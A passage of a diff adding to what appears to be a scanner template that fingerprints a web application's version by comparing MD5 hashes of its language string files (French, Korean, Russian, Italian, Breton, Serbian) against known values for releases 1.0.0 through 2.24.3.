dsl + name: 1.2.17 + dsl: + - "(\"a550b40d94b3c69f70da2813599940aa\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"938f2a18f47849452cc233a15ad1b612\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"72143266f4af99a58f2cbfaeafa1fcb3\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"f593de33a9047145b8729f01ff75c592\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"2d1ab904c91a7c537b5edb8df63d956d\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"620c4fa296e41d0b2428c5304aff4b5c\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"3c50721c6e1ef4f9c70ca0336fa9fc7a\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"991cee2ab7ffc380c7f206d5c2baba7a\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"775ec8f5a038dab65cbeadae69f43834\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"fe93f9e71d3933e6d300132e7d5c1c8f\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"9ecf2fb009eafe4e4d43c21ff55e03cb\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"b28e0165f737c46acbf541e406da2856\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"e8e933fccc6b2d057c3e45e9e24237b8\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"3c47d4f018ad4cc0108baa10e1d5130e\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"f3b1a00c903bccb5f7d80f8904807baa\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"5c631130db755b06a1ae2420371f106d\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"1dfa0777252bc259d8be8d26a4bf1743\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"0d1ab9138cd660420eab9c18c1193afe\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"719d7df3238cb61f72480343784f471b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"545c0bd95b63d0cc17c64756d945f6ec\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"f9e34df1e196f9b04734db7f750ac645\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_french.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"388d92d3a3251c1d93de50aa36e09ac1\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"2482ea81a35caa54a386c2ee6e86cd2c\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"e6f5d5f2e53a95152bb63adacc613308\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"a9b78f4b7b639da836f74cad7d37b7ff\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"07a1b810e74fbf4f3bf788884fa32601\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"9891e3f2689f7214eada23909d8f16a6\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"f64e70b7efb7b287aca5202a7596a712\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"93b613505ec0f72654b1d57aad82a2f1\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"de0d6cfb2b706e124c455b13e790be97\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"021c08ae7001def3dd87b89b1c21fd18\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"dd5c7f7e1486190230d71abf1c73c6e7\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"c5565edbdd421846cf82691e84e62fd9\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"fd642856c31543ceaa5354ed59908477\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"840df113b5c95fbbd9b7befdde968caf\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"f8def4a235d38fefe97484bbcd97fd3a\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"c08f08c79a91fdbad1108edd582ac12d\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"0b445a34c4fd21f86bce36f502fb934f\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"f3eed7609a755b9ce8115cc48879dbea\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"36a9a191105f3446f31115eed3f5b6b1\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"8d944bfe6710048ca00f9be794c4b139\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"f21b43c2ddfedcb13d80732d04fa2ee7\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"7263479a5307f0b3f95959d3e725d5b6\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"8fc2d1f22b5868bfcc1522569be68767\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"309d58cb02e442c518f657d922d12c20\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"96ce7eb03749dd0aa236ff6595c7133f\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"cb256c9c7a12fc62ee6eff0eb5da0d83\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"c5bb18f208a4ec7dc30323e102ca67a7\" == md5(body))" + - type: dsl + name: 1.1.2 - 1.1.4 + dsl: + - "(\"697cc74c609c3f4672a5106e937867da\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.1 + dsl: + - "(\"8472c5c814493a76399bc4a7fe9bd323\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"272174f2c3f6b18d4f3386336400b83b\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"2943228fd4624400d48a73f0addc60b1\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"73048bbc4fcb9a2acac4bd4424d3315d\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"a1aeea95e9c5c38f4cfba2642cd5ebca\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.10.1 + dsl: + - "(\"e561b9dcf1c4e4be3c19c50563a5f380\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"600b0382a61541982a7246494e9edfc0\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"450edd3090502bbfa287b531937e2c74\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"13aa59c6ffc743b6d8f3b921b643581b\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"2270024f4407fb9cbda25ace7c077d04\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"c9947fe205be78d279f544c75ced3471\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"f90514fc42f31796a89f9219ec00a6f6\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"16679489fcc4f775a37cdee443bda2ed\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"b6d7e5f359debaa809ad83224f93901a\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"6d7a5860aed4e6a431f37b11c02abd0e\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"18cabede24224236bffc7cda4b38d160\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"a2f9d2ae9d829dddc96ce8e21b5c1fa8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_korean.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"4f74c9970e35b2453bb1e5276fe592bb\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"9731afa3f57db6aafaadfca53d4e13b6\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"31b6ef075fe9f352a8123c3434d1cf90\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"9433b47d07b341becbdc6903b76e6af5\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"87af6c0f176d0a099659a7e778a2898a\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"4dacda671bdc1dcd565a735479b25c27\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"316b38414bcde4e69d0d5a6700a9ddc9\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"55133e56c73074faa2b56c56af951924\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"2dfd60bfe7ffba8454f61ea317a96676\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"e087aa85c3c1eddfe04a59f6d123d92b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"883c542b94c2853f4a1419db47ede927\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"cc109a3d22b57c16e65452245964f8c0\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"59538f9f1b1e93d0fc37e2b7e4a5b136\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"4b988abb01070607d846ebe519ea9e5c\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"6e27ebf082b46c9f1eee38b33a2ec930\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"f4783a70ff8db6d1cfbf7e8db849fc3c\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"1b6c63c781a6471b8ef1138a06ecd05b\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"c64ce611c52b14bf57ede411fd655881\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"1c9684b751c45446583ebdb0ca1e42ed\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"7d82f3bf0821e03c3453aab3724c61aa\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"5b9817cc17187790992f3ff06cc2dd52\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"2bd84930be5db0611ca293dc69334264\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"0b305c96cd338ddce6681d26c1466abd\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"ea5bfbefdc1c64bc4253cf68008892fd\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"753e9d414cef27401a44e139fb907df7\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"dceceb017e4613e47422a2f8c9418545\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"8f845e090211984e45eb6d4b15366b66\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"3a2403eab5ad3a3f4f16f8cdbaa17554\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"c825106692ac206822316cb558e36ef8\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"896d3940696f8e341efe81f5425f2691\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"75c6644ff1a822ad629ae951b246a6b5\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"f2b6fe5afb47d099f3c7f0e5f8f99d2b\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"c42edc53abe84c046870ddd40cf081e0\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"39d2d237bbf62c9f54dc49d1cd2a48d3\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"791f21585e5db0e5e0b86c7b82f2a4d3\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"d1e627841472d23f930e3111c7385001\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"7b5022db84cecea96c4e2c9d2261fbda\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"e18c7f708c96abda75312d8dda74a8b0\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"551bee490e4e23ec242660ebde27849c\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"0b5989d93491cdabcd08fe70e50c3322\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"15cfaa5e64d5db509ddc36837e13fb2e\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"7e74f17977d3305cb794541f761fc3a7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_russian.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"f19814b1309b8f8aac8e2a30babc4816\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"b43c628962bdef0b646b8eff3b2fc834\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + - "(\"d3e891dd07ed9803ebf717a14278f8f4\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"58dd1eeb959760c7b0da507eeca95686\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"ec56fc8195eb64774edd7db5e8663202\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"984a098fa6ee613442d31e53b16083d5\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"b227700d188df391f8e45d137382dd32\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"b793971dbc4c0ac66cffd34585e0b135\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"ee924b0becebf71961e47bc949896b13\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"92388c4c9dc275af39ede7a9d9126b88\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.6 + dsl: + - "(\"b01bf7bfe5bab041ccea2c386ce06aef\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"869a3e271f18f69527c20219a32ccdb2\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"3e9b9f5ed6cb3cc0cfeed92093e4d252\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"f392e0b0e2cecd58f09654dcff2bac00\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"0cf04ed2043a2d49506e37f7b335c142\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"afbb223aab69fef6be8537d0be64a095\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"98df160f4f5c74dd1364c371a1234fc2\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"0baff575ee89e308f4acfc019f2dda16\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"222e2271bd6159f4047331d10b91e5d5\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"58fc9728e3dd1676fb39f408f0f0ea5c\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"3718074613f6314f13c6046f4488a396\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"ae4ee0f05338bee6eb5ad14c447a2bc3\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"0580c84a5f494f007aa8bb730b7bd9c1\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"8697fc5ce2ae8c78b9b311cea9eef71d\" == md5(body))" + - type: dsl + name: 1.1.1 - 1.1.4 + dsl: + - "(\"186dcf12e0d86ae4e6d13b7fec11aeeb\" == md5(body))" + - type: dsl + name: 1.1.0 + dsl: + - "(\"273db99b8e11e6aaeb458042ba44bebc\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"aa086797746b8c6fd3d2446f7762e3fd\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"f3d7abea8e4c90af361304d1b8f28918\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"31af10d201b8373ce305e218103ff7d0\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"74cac54b13f9bcf27cc8cc23e5415e15\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"51c16a2ec7ec20e5e469e9deb2a177b3\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"1dc2f3ba5938eba06c7cb97686c4fc4c\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"d04bdab2660f0bb9200874cb05a8fee6\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"86649e1d785e2a28c8d6988d54705a5a\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"35e20c1c7f9c19e064e55f61a9e7aabf\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.17.2 + dsl: + - "(\"b0fa97d1040374247126a0fda5391525\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"fd94ab4e651eb338aa1f523e4a0e3978\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"d5afb3b1d291cd9f67f3235072e04159\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"5caf2db3bd150d9c16ace0b6ba51a2af\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"ff7748af4a9c61faa5b7ff8f1555d5d8\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"2be57b4f9d7e74adb8f3fb7edc673609\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"53ce92fa7a9b2c0c1bc39421b4651bcc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_italian.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"f4cea108c7847b111deb8bc197d45b98\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.5.2 + dsl: + - "(\"e26b54a8fc98e95794776af332c570d3\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"f53cdd96b8266724b77d51859548564e\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"a371adc09c36fd05298fa2267598a15f\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"f6de9f45d98a71b5484551ada1696687\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"12b24a95cfc06a769b74a8959f64de06\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"6558fa34bc5d7fca25f7b3563ee3aaf7\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"5e6fcc59ee3576d675bbdb17f5a6c6cf\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"7f3c2c78f33320cb6e5ac96e73ae76fe\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"27bf8bbb3d8a321086941132f15f5904\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"71a69b3be3c4ce5d866b56887f781df6\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"2b8383ca16ce80582423ebd7216276b0\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"6d95f50981543f60a28259e08e6d1eed\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"ffa96c2e9a7896d934d6dbfa4e0dbb5f\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"653c11b5d30ca06e7c06aa20eb5c5948\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"b651f0b4308f0e2a0cf6cf4704b63084\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"8528eda1bbc920dfe4f21c91622488dd\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"77df7f0189039b9ea8548567164fca45\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"6ef5af275e7d0ee2e9adc90ec0d85ee0\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"4f98aed2fce088c27b39803c4ac824cd\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"ccb478a0c5cc1b89b33d17757cbb1df8\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"33ca6da72dea2715115d24f814a53418\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"b1ba3f0a390d3b34a74d049655ddad6f\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"1cfe9863e6c8b9b676cae73765b35297\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"090a5a44d82490a78d9335195c43bafd\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"d5c235b00b25e856001d41bb2cf04481\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"3f42a71ce3117b1d736c29ed54cf865c\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"26d083e96b75f5f3d16449de79461b75\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"c76df5aa811b49eac36a1ef519956a1b\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"c8432890926d730ac5cf7f5d17ceb0a1\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"a2f841e3fd1443b4ffb996758fa2c751\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"cae20234d5530c193240ed614a649ad9\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"232813b7fffb60d5358fb81ac209ed65\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.18.1 + dsl: + - "(\"207a116aa484b3a6bd971bb852effb76\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"ce31bb000ba95422bfb7c75d174cb44c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"9efeea9e09d8f019b7ec1c56acc3b222\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"7c3d5447e85cd95d3fcdd16c61b4aa53\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"71e8b612d1b1d1e8170b8914efc73be2\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"a6d1dc636e66ef16cba751353da3bc3c\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"c844a7cb67ee96e256131d26a549830c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_breton.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.8.1 + dsl: + - "(\"dfb7e5b378bf7887df296acb492d1922\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"e0110288015a21dc4e71b64a6c7a97bd\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"3ccb1d1297e035caa2f64f4fd08c468c\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"737725b168215729b5d07a78dab67d9c\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"dd2516d9a0d7cc646081da192ca276ac\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"e9da8547f66b8a79ede080d0edbc68bd\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"27b0b3631592fa7b135f16a2d9bd1366\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"1b93943791e8b63c95cc7c6fc0c8ec4a\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"b260c2b511af576d70df257420a63e2b\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"e89b4fc3ed5329f41b29f260fe865559\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"56f12c2bca1e8d591563ff0c8d10876b\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"fdfb0a41d3145b56dcc0fe6f1f0f650e\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"6dd8cd14929d76440189c843da67ac4f\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"4d172d9bfe9b4319152b8fe35fc949e4\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"01840fce6e61757c29791ebc086ffc8a\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"2d803f4025855c9e53963f04fbb0a9c3\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"d401d5d95475dc724e1540f4a86a7b15\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"9e3a437b7137108f1bcd45fb7d8334cb\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"14a90d018788c5b020c41b35d5db402a\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"e461872208993b16753b898635108bbf\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"6340e4ab79e2b36df8d0c3ff15f035ab\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"c86f83fdd8c046c2e5205adf98331930\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"f2b47ef9ac71450aa4a846b243f8c6a5\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.10.1 + dsl: + - "(\"ff2d4cdfbc2d25e3949240b518eb8dc7\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"dd0f871e4cc8bcaf336f5b2b6e63cd7a\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"28bca7a7044c740379326d75b999fa17\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"8241ade7062dd142ed3c7bc9c74d161f\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"0ccd2ae5285ef3943a23cf0f189b9baf\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.18.1 + dsl: + - "(\"b9885b46e5eda70d9c277acb71b33184\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"f334b4e4abf5feaaa3ebf58768536da5\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"9d07353272c31672d519030290f64bd5\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"b98e5831979357dc1f8ab15cda83212f\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"acb2d1907f65a22f6b62fd7ded8d6cc9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_serbian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.10.1 + dsl: + - "(\"0392eef1e913aff50a2b03cce2523a06\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"a15fe0d65da70583d43d5f087067b3c2\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"6bacf8fee885b10b33784264e7dbb1c0\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"03674b1662989f156bfe2aee223c8bc1\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"a3d1c3bbe26ea326589c83fadce50858\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"77cf25f06a18378a56e865e2ae5c085f\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"ca0011b6df2a84f56de32cc36a17d196\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - 